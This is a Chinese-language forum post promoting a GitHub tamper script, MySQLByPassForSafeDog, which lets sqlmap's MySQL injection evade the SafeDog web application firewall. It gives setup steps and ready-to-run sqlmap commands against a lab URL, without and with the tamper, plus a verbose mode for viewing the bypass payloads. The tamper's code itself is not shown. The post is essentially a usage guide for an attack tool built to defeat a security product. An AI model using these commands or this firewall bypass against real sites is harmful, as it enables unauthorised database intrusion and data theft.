MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

Aspark · 发表于 2022-9-3 23:21:45

项目作者：Tas9er
项目地址：https://github.com/Tas9er/MySQLByPassForSafeDog

0x01 工具介绍
此Tamper仅仅适用于MySQL数据库，在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。
0x02 安装与使用
1、安装网站安全狗Apache最新版

编辑

2、启用安全狗，不加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

编辑

3、启用安全狗，添加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

编辑

4、绕过POC
可以添加参数-v 3进行学习查看
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

编辑

		自动登录	找回密码
密码			立即注册

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog​

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog